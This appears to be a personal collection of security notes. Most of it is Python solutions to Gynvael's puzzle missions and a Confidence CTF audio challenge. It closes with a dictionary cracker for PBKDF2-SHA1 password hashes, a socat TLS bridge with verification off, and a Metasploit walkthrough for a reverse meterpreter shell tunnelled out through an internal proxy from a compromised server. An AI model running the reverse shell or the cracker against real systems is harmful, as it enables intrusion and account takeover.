# GynvaelEN's mission 006


# cat mission_06.py
from PIL import Image
import qrtools

# Side length of the module grid and the integer upscale factor used before decoding.
n = 25
m = 3
fn = 'mission_06.png'

# 8-bit greyscale canvas, all white; dark modules are punched in below.
matrix = [255] * (n * n)

# One bracketed, comma-separated pair per line, e.g. "(i, j)".
with open('mission_06.data') as f:
 coords = f.read().splitlines()

for entry in coords:
 parts = entry[1:-1].split(', ')
 row, col = int(parts[0]), int(parts[1])
 matrix[row * n + col] = 0

image = Image.new('L', (n, n))
image.putdata(matrix)
image.save(fn)

# Re-open, rotate by -90 degrees and scale up so the decoder has enough pixels.
# Image.ANTIALIAS is an alias of Image.LANCZOS and was removed in Pillow 10.
img = Image.open(fn).rotate(-90).resize((n * m, n * m), Image.ANTIALIAS)
img.save(fn)

qr = qrtools.QR(filename = fn)
if qr.decode():
 print qr.data

# python mission_06.py
Mirrored QR? Seriously?!

Source

https://www.youtube.com/watch?v=KvyBn4Btv8E (1:32:02)

# GynvaelEN's mission 005


# curl -v http://gynvael.vexillium.org/ext/thepicture/picture.image
Content-Encoding: rle
Content-Type: image/raw; w=640,h=212,bpp=8
# cat mission_05.py
from struct import unpack
from PIL import Image

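# Image geometry taken from the Content-Type header (image/raw; w=640,h=212,bpp=8).
width = 640
height = 212

# Binary mode: text mode would translate newline bytes on some platforms and
# corrupt the run lengths.
with open('picture.image', 'rb') as f:
 cdata = f.read()

# The payload is run-length encoded as (count, value) byte pairs. The value's
# low bit is flipped and the result stretched to a full 8-bit grey level.
ddata = []
for i in range(0, len(cdata), 2):
 count = unpack('B', cdata[i])[0]
 v = (unpack('B', cdata[i + 1])[0] ^ 1) * 255
 ddata.extend([v] * count)

image = Image.new('L', (width, height))
image.putdata(ddata)
image.save('output.png')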
# python mission_05.py


Source

https://www.youtube.com/watch?v=W7s5CWaw6I4 (1:20:57)

Reference

https://en.wikipedia.org/wiki/Run-length_encoding

# Confidence CTF 2k17: Starbyte - misc - 200 pts


# cat starbyte.py
from PIL import Image, ImageDraw
import scipy.io.wavfile
import sys
import wave

inputfile = sys.argv[1]

# Report the WAV header fields, then load the samples with scipy.
wav = wave.open(inputfile, 'rb')
print 'Number of audio channels = ',  wav.getnchannels()
print 'Sample width = ', wav.getsampwidth(), '(bytes)'
print 'Sampling frequency = ', wav.getframerate(), '(Hz)'
frames = wav.getnframes()
print 'Number of audio frames = ', frames
wav.close()
rate, data = scipy.io.wavfile.read(inputfile)

# Each sample falls into one of three bands: above 90 is a '1', 24..90 is a
# '0', anything lower is neither. A bit is recorded each time the band
# changes into '1' or '0', so a sustained level counts once.
last_level = -1
bits = ''
text = ''

for sample in data:
 if sample > 90:
  level = 1
 elif sample > 23:
  level = 0
 else:
  level = -1
 if level >= 0 and level != last_level:
  bits += str(level)
 last_level = level
 # Every 10 bits form one character, least significant bit first.
 if len(bits) == 10:
  text += chr(int(bits[::-1], 2))
  bits = ''

# Each decoded line is a drawing command: an opcode followed by integers.
image = Image.new('RGB', (1000, 1000), 'black')
draw = ImageDraw.Draw(image)

for command in text.split('\n'):
 fields = command.split()
 if 'LINE' in fields:
  x1, y1, x2, y2 = map(int, fields[1:])
  draw.line([(x1, y1), (x2, y2)], 'green')
 elif 'CRCL' in fields:
  cx, cy, rad = map(int, fields[1:])
  draw.arc([(cx - rad, cy - rad), (cx + rad, cy + rad)], 0, 360, 'green')
 # Other opcodes (a REKT rectangle handler was tried and left disabled) are ignored.

image.save('image.png')
# python starbyte.py starbyte.wav
Number of audio channels =  1
Sample width =  1 (bytes)
Sampling frequency =  44100 (Hz)
Number of audio frames =  3885808
# eog image.png

# GynvaelEN's mission 004


# cat mission_04.py
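def hex2bin(h):
 """Return the hex string *h* as a string of bits, eight per hex byte pair.

 Each two-character chunk is parsed as a base-16 byte and zero-padded to
 8 bits. Raises ValueError if *h* contains a non-hex character.
 """
 # Bug fix: the original indexed the module-level ``u`` instead of the
 # parameter, so the function only worked when called as hex2bin(u).
 return ''.join(format(int(h[i:i + 2], 16), '08b') for i in range(0, len(h), 2))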

def decode(u):
 """Decode one UTF-8-style byte sequence, given as hex, to a single character.

 *u* is the hex text of a 1-, 2-, 3- or 4-byte sequence. For multi-byte
 input the payload bits are gathered from each byte (the lead byte's tag
 bits and every ``10`` continuation prefix are dropped) and returned via
 ``chr``. A hex string of any other length yields None.
 """
 # Payload bit ranges of the concatenated bit string, keyed by hex length.
 payload_slices = {
  4: [(3, 8), (10, None)],
  6: [(4, 8), (10, 16), (18, None)],
  8: [(5, 8), (10, 16), (18, 24), (26, None)],
 }
 if len(u) == 2:
  return u.decode('hex')
 slices = payload_slices.get(len(u))
 if slices is None:
  return None
 binary = hex2bin(u)
 bits = ''.join(binary[start:stop] for start, stop in slices)
 return chr(int(bits, 2))

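# Hex of the hidden text, one UTF-8-style sequence per character (many of them
# longer than the shortest valid encoding would be).
message = 'E0818F766572C1ACE081AFE081AEC1A7E080A0E08195C194E081862DE080B8E080A0F08081B7C1A17320C1B3F08081B563C1A820E081A1F08080A0E081A6F08081B5F08081AE20E081A6E081A5F08081A1C1B475E081B2E081A5F08080AE'

result = ''

i = 0

while i < len(message):
 # The sequence length follows from the lead byte's prefix: 0xxxxxxx -> 1
 # byte, 110xxxxx -> 2, 1110xxxx -> 3, 11110xxx -> 4 (two hex chars each).
 byte = int(message[i:i+2], 16)
 binary = format(byte, '08b')
 if binary[0] == '0':
  j = 2
 elif binary[0:3] == '110':
  j = 4
 elif binary[0:4] == '1110':
  j = 6
 elif binary[0:5] == '11110':
  j = 8
 else:
  # A continuation byte (or a 5-/6-byte lead) here means the stream is out
  # of sync; previously the loop silently reused the last value of j.
  raise ValueError('unexpected lead byte %02X at hex offset %d' % (byte, i))
 u = message[i:i + j]
 i += j
 result += decode(u)

print result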
# python mission_04.py
Overlong UTF-8 was such a fun feature.

Source

https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)

Reference

https://es.wikipedia.org/wiki/UTF-8#Codificaci.C3.B3n_de_los_caracteres

# GynvaelEN's mission 003


# cat mission_03.py
import itertools

def base4to10(num):
 """Convert the base-4 digit string *num* (most significant first) to an int.

 The empty string converts to 0. Digits are not range-checked, so any
 decimal digit character is accepted and weighted by its power of four.
 """
 value = 0
 for digit in num:
  value = value * 4 + int(digit)
 return value

def ascii_string(s):
 """Return True if every character of *s* is printable ASCII (0x20..0x7E).

 The empty string is vacuously True.
 """
 return all(32 <= ord(ch) <= 126 for ch in s)

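# The bit stream to decode; the final character (presumably the file's
# trailing newline) is dropped.
with open('huffman.code') as f:
 bd = f.read()[:-1]

# Candidate codewords of one to three bits for the four base-4 digits.
values = ['0', '1', '00', '01', '10', '11', '000', '001', '010', '011', '100', '101', '110', '111']

for i in itertools.permutations(values, 4):
 # Map the chosen codewords onto the base-4 digits 0..3.
 tree = {
  i[0]: '0',
  i[1]: '1',
  i[2]: '2',
  i[3]: '3',
 }
 # Greedy prefix decode: emit a digit as soon as the buffered bits match.
 code = ''
 result = ''
 for d in bd:
  code += d
  if code in tree:
   result += tree[code]
   code = ''
 try:
  decv = base4to10(result)
  # Python 2 long() repr ends in 'L'; strip it so the hex text is clean.
  hexv = hex(decv)[2:].replace('L', '')
  ascv = hexv.decode('hex')
  if ascii_string(ascv) and len(ascv) > 4:
   print 'tree =', tree
   print 'result =', result
   print 'dec =', decv
   print 'bytes =', hexv
   print 'ascii =', ascv[::-1]
   print
 except (TypeError, ValueError):
  # An odd-length hex string cannot be turned into bytes; skip that tree.
  # Only these are expected here -- the bare except also swallowed
  # KeyboardInterrupt, so the 24024-permutation search could not be stopped.
  pass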

# python mission_03.py
tree = {'11': '1', '0': '2', '100': '0', '101': '3'}
result = 3231202120213111211131203001031030012101202131112031322131303001323130113211313131312111030030013010300120213011212030012101031
dec = 26860288614901905570716094189682157357950360778336264927367113021610209076301
bytes = 3b6262756576304d30646275637a77307b71797777654c30713062716630644d
ascii = Md0fqb0q0Lewwyq{0wzcubd0M0veubb;

tree = {'11': '1', '0': '3', '100': '0', '101': '2'}
result = 2321303130312111311121302001021020013101303121113021233121202001232120112311212121213111020020012010200130312011313020013101021
dec = 21010374883428224108739011194252932925839770786883498221738205492211234141257
bytes = 2e7373657567204920747365726f66206e616d66667548206120736177207449
ascii = It was a Huffman forest I guess.

Source

https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)

# GynvaelEN's mission 002


# cat mission_02.py
# Prefix code recovered for the stream: each codeword stands for one hex digit.
tree = {
 '01': '0',
 '0010': '1',
 '0001': '2',
 '00110': '3',
 '10': '4',
 '000000': '5',
 '00000100': '6',
 '00000101': '7',
 '00000110': '8',
 '00000111': '9',
 '00001': 'a',
 '001110': 'b',
 '001111': 'c',
 '111': 'd',
 '1101': 'e',
 '1100': 'f',
}

# The final character of the file is dropped before decoding.
with open('huffman.code') as f:
 bits = f.read()[:-1]

# Walk the stream bit by bit; whenever the buffered bits form a codeword,
# emit its hex digit and start a fresh buffer.
hexencoded = ''
buffered = ''
for bit in bits:
 buffered += bit
 digit = tree.get(buffered)
 if digit is not None:
  hexencoded += digit
  buffered = ''

print hexencoded
print hexencoded.decode('hex')

# python mission_02.py
49204c696b652054726565732e20466c6f7765727320746f6f2e
I Like Trees. Flowers too.

Source

https://www.youtube.com/watch?v=HN_tI601jNU (1:38:27)

Reference

https://www.siggraph.org/education/materials/HyperGraph/video/mpeg/mpegfaq/huffman_tutorial.html

# GynvaelEN's mission 001


# wget https://github.com/dwyl/english-words/raw/master/words.txt
# grep '^........$' words.txt > wordlist.txt
# cat mission_001.py
import hashlib

# Target: md5(word_a) XOR md5(word_b) must equal this 16-byte value.
solution = '76fb930fd0dbc6cba6cf5bd85005a92a'.decode('hex')

# Index every candidate word by its MD5 digest so the partner is one dict probe.
with open('wordlist.txt') as f:
 wh = dict((hashlib.md5(word).digest(), word) for word in f.read().splitlines())

# XOR fixes the partner's digest; stop at the first pair found.
for k, v in wh.iteritems():
 partner = ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(k, solution))
 if partner in wh:
  print v, wh[partner]
  break
# python mission_001.py
ambrosia virology

Source

https://www.youtube.com/watch?v=JhsHGms_7JQ (1:21:51)

# TLS bridge with socat


# NOTE: -nodes writes key.pem unencrypted, so server.pem below holds the private key in clear and must not be readable by other users.
# openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
# cat key.pem > server.pem
# cat cert.pem >> server.pem
# NOTE: verify=0 on both addresses disables certificate verification, so neither leg authenticates its peer; method=ssl3 offers the long-deprecated SSLv3 to clients, and -v also copies every transferred byte (the plaintext) to stderr.
# socat -v openssl-listen:443,cert=/tmp/server.pem,verify=0,reuseaddr,fork,method=ssl3 ssl:127.0.0.1:1234,verify=0,method=tls1.2

# Cracking PBKDF2WithHmacSHA1/160/128000


# cat crack.py
import base64
import hashlib
import sys

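# Usage: crack.py WORDLIST BASE64_BLOB
# Blob layout used here: bytes [8:16] are the salt, [16:] the derived key.
# NOTE(review): the first 8 bytes are not parsed. In the sample blob on this
# page they decode to 0x000000a0 (= 160) and 0x0001f400 (= 128000), which
# appear to be the key length in bits and the iteration count hard-coded
# below -- confirm before relying on that layout for other inputs.
wordlist_path = sys.argv[1]
b64e = sys.argv[2]
b64d = base64.b64decode(b64e)
secret = b64d[16:]

# `with` closes the file on every path; the original also shadowed the
# builtin `dict` with this variable.
with open(wordlist_path) as f:
 words = f.read().splitlines()

hash_name = 'sha1'
salt = b64d[8:16]
iterations = 128000
# Integer division keeps dklen an int on Python 3 as well (pbkdf2_hmac rejects floats).
dklen = 160 // 8

for word in words:
 dk = hashlib.pbkdf2_hmac(hash_name, word, salt, iterations, dklen)
 if dk == secret:
  print b64e, word
  break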

# cat dict.txt
test

# python crack.py dict.txt AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp
AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp test

References

https://en.wikipedia.org/wiki/PBKDF2
https://docs.python.org/3/library/hashlib.html#key-derivation

# Reverse meterpreter through an internal HTTP proxy server


Attacker's host

msf > use payload/python/meterpreter/reverse_http
msf payload(reverse_http) > set lhost LOCAL_PUBLIC_IP
msf payload(reverse_http) > set lport 80
msf payload(reverse_http) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf payload(reverse_http) > set payloadproxyport INTERNAL_PROXY_PORT
msf payload(reverse_http) > generate -b '\x00\xff' -t raw -f met.py

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_http
msf exploit(handler) > set lhost LOCAL_PUBLIC_IP
msf exploit(handler) > set lport 80
msf exploit(handler) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf exploit(handler) > set PayloadProxyPort INTERNAL_PROXY_PORT
msf exploit(handler) > run

Compromised server

# python met.py